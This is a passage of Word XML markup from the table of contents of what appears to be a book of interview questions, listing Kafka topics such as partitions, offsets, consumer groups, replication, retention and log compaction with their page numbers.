              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308246 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1006</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="580EE1DC" w14:textId="74DAC8A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4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offset and partition in Kafka?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308247 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1007</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4DFBA743" w14:textId="2444402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4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are Kafka topics, and how are they used?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308248 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1009</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A4C9639" w14:textId="768FDB7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4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Kafka topics and how data is stored in topics and consumed by consumers?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308249 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1009</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="772BDD39" w14:textId="6398041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5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a Kafka producer, and how does it send messages?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308250 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1010</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68D2CFB6" w14:textId="34E7648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5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escribe the Kafka producer role and how it sends messages to Kafka topics, including partitioning and message key concepts?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308251 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1011</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A776AA1" w14:textId="3781615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5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a Kafka consumer, and how does it consume messages?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308252 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1012</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5242A9CF" w14:textId="1A707F0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5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escribe the Kafka consumer role and how it reads messages from topics and manages offsets?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308253 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1013</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="627945D6" w14:textId="623C99C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5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a Kafka Broker?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308254 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1015</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61790233" w14:textId="79F6592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5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efine a Kafka broker and its role in managing topics, partitions, and message replication?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308255 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1016</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A564819" w14:textId="346C735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5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a Kafka Consumer Group?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308256 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1016</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B18E4A9" w14:textId="4AB3404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5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the concept of a Kafka consumer group and how it allows multiple consumers to scale and consume messages from topics?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308257 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1017</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="650911B7" w14:textId="0639772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5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the three-message delivery guarantees in Kafka and how they are implemented?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308258 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1018</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27F99005" w14:textId="5EA2519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5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are Kafka partitions, and why are they used?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308259 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1020</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C16D0EE" w14:textId="6037109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6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scuss the concept of Kafka partitions, how they enable parallel processing, and the benefits of distributing data across multiple partitions?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308260 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1022</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="025A0E62" w14:textId="5727E5E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6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the concept of Kafka offset and how it is managed by consumers?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308261 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1024</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53E689DC" w14:textId="547333F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6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efine offset in Kafka, how it is assigned, and how Kafka consumers track their consumption position?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308262 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1026</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E43A8F8" w14:textId="6DC3382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6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does Kafka ensure data reliability and fault tolerance?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308263 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1028</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14B62017" w14:textId="2AE5D37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6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Kafka’s replication mechanism and how data is replicated across brokers to prevent data loss?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308264 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1030</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="29F9DEB6" w14:textId="39940F9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6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retention policy in Kafka, and how can it be configured?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308265 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1031</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71E1A31D" w14:textId="628777F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6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escribe how Kafka retains messages and the different retention policies available (time-based, size-based, etc.)?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308266 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1033</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="783B75CF" w14:textId="021BE2A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6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can you monitor a Kafka cluster?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308267 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1035</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C238428" w14:textId="4D9FA30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6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scuss tools and techniques for monitoring Kafka performance and health (e.g., JMX metrics, Kafka Manager, Burrow, Prometheus)?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308268 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1037</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1991B30C" w14:textId="419CDC2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6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Kafka’s log compaction feature?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308269 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1039</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="058E95E6" w14:textId="2444A11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7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log compaction in Kafka, how it helps manage the log size, and the use cases for log compaction?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308270 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1041</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A19576B" w14:textId="2D5E0FB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7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Compare Kafka with traditional messaging systems in terms of architecture, message durability, scalability, and performance?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
